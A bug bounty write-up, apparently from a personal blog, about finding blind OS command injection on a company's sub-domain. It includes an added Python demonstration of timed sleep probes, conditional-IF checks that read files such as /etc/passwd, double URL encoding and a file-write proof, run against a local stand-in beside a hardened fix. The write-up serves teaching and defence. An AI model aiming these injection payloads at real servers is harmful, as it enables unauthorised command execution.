Beyond the wall: command injection still alive.

Notes

  • I have changed the name of the company I'm talking about; I'll call it Kings-Landing.
  • There is a short version of the story (TL;DR) and a Takeaways section at the end of the write-up if you want to save yourself 7 minutes or don't have time for my jokes :)

HTTP history

After a couple of hours of hunting on Kings-Landing's main domain didn't reveal anything interesting, it was time to move to the next sub-domain in scope.

The response? 500 Internal Server Error

The error is gone and it’s 200 Ok again.

Active Scan++

False Positive everywhere!

But the Active Scan++ extension had a different opinion about that one.

This was the first time, since I installed the extension several months ago, that I saw any output from it. What made it even more exciting was that I remembered installing it only after reading an article about a researcher who found a $20,000 RCE with Active Scan++.

The Payload was: `sleep 11`

OS Command Injection

This was the perfect time to engage the super ultimate weapon every hacker has: the Google search engine.

The best technique I found for exploiting the vulnerability was making the server send an outbound request with cURL or wget. Unfortunately, the server (or Cloudflare) didn't allow any outbound traffic, not even ping, and nslookup didn't work either.

Conditional IF

I have a good server that sleeps when I tell it to, and by measuring the response time I can confirm that the sleep command executed. But I wanted to execute other commands and confirm those too. It seemed like the perfect time for a conditional IF statement: wrap the command in an if, sleep only when it succeeds, and read the answer from the response time.

And the server falls asleep.

The Real Impact

Now let's do some serious stuff: creating a file.
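The three steps above (the `sleep` probe, the conditional IF, and the file write) are the whole blind command-injection workflow, so here they are together as an added example. This is my code, not the author's and not Kings-Landing's: the real endpoint, parameter and back-end command are unknown, so `vulnerable_handler` is a constructed local stand-in that splices a parameter into a shell command line the way the target evidently did (`echo` is an assumption, and the delay is 2 seconds instead of the scanner's 11 to keep it quick). The hardened form beside it passes the value as a single argv element with no shell, which is what kills the bug.

```python
import os
import shlex
import subprocess
import tempfile
import time
from urllib.parse import quote


# --- Constructed stand-in for the vulnerable endpoint (not the target's code) ---
# The request parameter is concatenated into a shell command line, so ";" ends
# our command and starts another one. "echo" is an assumption so this runs offline.
def vulnerable_handler(value: str) -> str:
    out = subprocess.run("echo " + value, shell=True, capture_output=True, text=True)
    return out.stdout


# Hardened form: no shell, the value is one argv element, so ";", "|" and
# "$(...)" are plain characters rather than operators.
def hardened_handler(value: str) -> str:
    out = subprocess.run(["echo", value], capture_output=True, text=True)
    return out.stdout


# --- Attacker-side helpers ---
def encode_payload(payload: str, double: bool = False) -> str:
    """URL-encode the payload once, or twice for a front end that decodes once
    before filtering and leaves the second decode to the back end."""
    once = quote(payload, safe="")
    return quote(once, safe="") if double else once


def timed(handler, value: str) -> float:
    """Send one value and return the elapsed wall-clock seconds."""
    start = time.monotonic()
    handler(value)
    return time.monotonic() - start


def is_injectable(handler, delay: float = 2.0) -> bool:
    """Blind detection, the same idea as the scanner's 'sleep 11': a response
    that takes about `delay` seconds longer than the baseline means the shell
    ran our sleep."""
    baseline = timed(handler, "probe")
    with_sleep = timed(handler, f"probe; sleep {delay}")
    return with_sleep - baseline >= delay * 0.9


def check_condition(handler, shell_test: str, delay: float = 2.0) -> bool:
    """The conditional-IF trick: sleep only when the shell test succeeds, so the
    timing answers a yes/no question about the box without any outbound traffic."""
    payload = f"probe; if {shell_test}; then sleep {delay}; fi"
    return timed(handler, payload) >= delay * 0.9


def write_marker(handler, path: str) -> bool:
    """Impact proof: create a file on the host and confirm it appeared."""
    handler(f"probe; touch {shlex.quote(path)}")
    return os.path.exists(path)


def prove_file_write(handler) -> bool:
    """Run the file-write proof in a fresh temp directory (constructed target path)."""
    return write_marker(handler, os.path.join(tempfile.mkdtemp(), "poc.txt"))


if __name__ == "__main__":
    print("single-encoded:", encode_payload("sleep 11"))
    print("double-encoded:", encode_payload("sleep 11", double=True))
    for name, h in (("vulnerable", vulnerable_handler), ("hardened", hardened_handler)):
        print(name, "injectable:", is_injectable(h))
        print(name, "/etc/passwd exists:", check_condition(h, "[ -f /etc/passwd ]"))
        print(name, "file written:", prove_file_write(h))
```

Against the hardened handler every probe comes back fast and no file appears, because the whole string is just an argument to `echo`. The threshold is 90% of the delay rather than an exact match so that ordinary network jitter doesn't flip the answer; on a real target, repeat a positive probe with a different delay before believing it.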

Reporting

At this point my journey came to its end. I wrote a detailed report that laid out several ways a threat actor could use the bug to compromise the whole back-end server, from uploading a bash shell to deleting the root directory.

Many scenarios, yet the end is the same. Dracarys.
Really?!!

TL;DR

This is the short version of the story:

Takeaways

Technical

  • Active Scan++ is worth having installed.
  • Automation is the key. Save your effort for the logical bugs and for investigating the weird behaviors reported by tools.
  • URL encoding & double URL encoding.
  • Tunnel vision is:

Follow Me

https://twitter.com/a_Constant_

A web developer & a Bug Hunter.